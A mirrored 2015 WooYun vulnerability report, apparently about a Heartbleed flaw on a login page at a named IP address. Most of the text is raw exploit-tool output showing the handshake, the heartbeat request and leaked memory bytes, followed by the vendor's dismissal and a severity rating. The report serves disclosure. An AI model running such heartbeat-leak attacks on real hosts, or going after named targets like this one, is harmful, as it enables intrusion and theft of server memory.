乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-04: 细节已通知厂商并且等待厂商处理中 2015-06-09: 厂商已经主动忽略漏洞,细节向公众公开
**
地址:https://58.221.91.194/login.html
[*] 58.221.91.194:443 - Sending Client Hello...[!] SSL record #1:[!] Type: 22[!] Version: 0x0301[!] Length: 86[!] Handshake #1:[!] Length: 82[!] Type: Server Hello (2)[!] Server Hello Version: 0x0301[!] Server Hello random data: 556fd66ef9aa1510320df88a51d80a631047da3ffce1b1304486bbe92a44ed0d[!] Server Hello Session ID length: 32[!] Server Hello Session ID: 9ffc7a35aeabe4f585b8d5594a9f465165865a1d3ec9beed7505e6cf3ed30725[!] SSL record #2:[!] Type: 22[!] Version: 0x0301[!] Length: 707[!] Handshake #1:[!] Length: 703[!] Type: Certificate Data (11)[!] Certificates length: 700[!] Data length: 703[!] Certificate #1:[!] Certificate #1: Length: 697[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x00000005687680>, issuer=#<OpenSSL::X509::Name:0x000000056875b8>, serial=#<OpenSSL::BN:0x000000056874f0>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>[!] SSL record #3:[!] Type: 22[!] Version: 0x0301[!] Length: 203[!] Handshake #1:[!] Length: 199[!] Type: Server Key Exchange (12)[!] SSL record #4:[!] Type: 22[!] Version: 0x0301[!] Length: 4[!] Handshake #1:[!] Length: 0[!] Type: Server Hello Done (14)[*] 58.221.91.194:443 - Sending Client Hello...[!] SSL record #1:[!] Type: 22[!] Version: 0x0301[!] Length: 86[!] Handshake #1:[!] Length: 82[!] Type: Server Hello (2)[!] Server Hello Version: 0x0301[!] Server Hello random data: 556fd67959f6d9534df1a7521901d3097ca2c90afe4a78a72372beecbb1b0375[!] Server Hello Session ID length: 32[!] Server Hello Session ID: ac3710dc37e28416eefa02da2f28f6a95d112b9ebb46160f88c78b7c53ebec7e[!] SSL record #2:[!] Type: 22[!] Version: 0x0301[!] Length: 707[!] Handshake #1:[!] Length: 703[!] Type: Certificate Data (11)[!] Certificates length: 700[!] Data length: 703[!] Certificate #1:[!] Certificate #1: Length: 697[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x000000055da340>, issuer=#<OpenSSL::X509::Name:0x000000055da2a0>, serial=#<OpenSSL::BN:0x000000055da200>, not_before=2012-04-16 12:56:48 UTC, not_after=2022-04-24 12:56:48 UTC>[!] SSL record #3:[!] Type: 22[!] Version: 0x0301[!] Length: 203[!] Handshake #1:[!] Length: 199[!] Type: Server Key Exchange (12)[!] SSL record #4:[!] Type: 22[!] Version: 0x0301[!] Length: 4[!] Handshake #1:[!] Length: 0[!] Type: Server Hello Done (14)[*] 58.221.91.194:443 - Sending Heartbeat...[*] 58.221.91.194:443 - Heartbeat response, 12955 bytes[+] 58.221.91.194:443 - Heartbeat response with leak[*] 58.221.91.194:443 - Printable info leaked: Uo$M 5.[8sWyo{_f"!98532ED/A[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed
RT
***
危害等级:无影响厂商忽略
忽略时间:2015-06-09 14:10
漏洞Rank:4 (WooYun评价)
暂无